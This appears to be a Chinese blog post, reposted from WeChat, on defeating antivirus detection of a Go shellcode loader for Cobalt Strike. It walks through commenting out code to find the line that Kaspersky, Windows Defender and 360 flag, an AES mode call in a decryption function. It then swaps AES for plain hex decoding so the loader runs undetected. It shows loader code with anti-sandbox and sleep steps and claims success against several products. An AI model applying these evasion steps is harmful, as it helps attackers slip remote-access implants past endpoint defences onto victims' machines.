免杀Tips第二期

简介

上一期已经给大家分享过了静态层面的绕过，本期了也依然是讲静态特征的绕过，不过本期从源码层面开始教学，接下来你会学到如何定位特征，如何去绕过。

本次依然纯净无魔改CS对抗WDF，卡巴斯基，360 以及 云环境，全程联网状态！

提要

* 换套代码我能不能也死灰复燃？* 你需要会点编程原理。

进入实验

先用免杀模板生成EXE

效果

卡巴

WDF

360

卡巴，WDF这里就不多说了铁能上线，但是流量必死，没有异议我们就继续，其实大家要是能搞明白这个QVM 编号就知道怎么处理了 难道真是360和火绒无解么？

代码

开始找出问题的代码， 首先我们需要知道程序肯定会先从Main开始运行（这里我们排除点字符串特征），代码的第一步是反沙箱，我们注释掉 编译在去看看

func main() {    sandbox.See_through()  //反沙箱    time.Sleep(10 * time.Second)
    shellcode :=IpGjgs(sc)    ............

报毒了，那么出问题的就不是这里了。接着往下看，跳过时间延迟，虽然有时候会被标记，但是卡巴WDF没标记，就证明是正常的。

“ shellcode :=IpGjgs(sc)” //这里是进行解密shellcode的，我们注释掉，并且把shellcode换成弹计算器的。 

结果弹出了计算器，那么就是这里的问题了。 

那么已经找到问题所在了，我们进入这个函数接着找 不断的注释编译，扫描，得出问题代码

func IpGjgs(src string) []byte {    i, _ := strconv.Atoi(Kmode)    skey, _ := hex.DecodeString(aeskey)    aes := encrypt.NewAES() // 默认是Cbc 模式    aes.SetMode(i)    //是这里被标记报毒了    bsrc := encrypt.Bagua_de(src)    shell := encrypt.Aes_de(bsrc, skey, aes)    return shell}

aes.SetMode(i)  // 问题所在了

接下来该怎么办了？怎么办了？

•1.对这个AES算法稍做处理•2.换掉加密算法

修复代码

我们替换掉AES，就用最原始的HEX转换shellcode，最古老的远控也可以用我这套代码死灰复燃,360 肯定流量是过的，WDF也过了。卡巴死。

结论

免杀 本质就是在于不断的测试免杀就像爱情一样，你不知道他什么时候回来 目前正在考虑闭源更新Github，开源大家都玩废了。那就让白嫖党好好嫖吧。 bilibili有演示视频，ID:Arks7

原文始发于微信公众号（一颗好韭菜）：免杀Tips第二期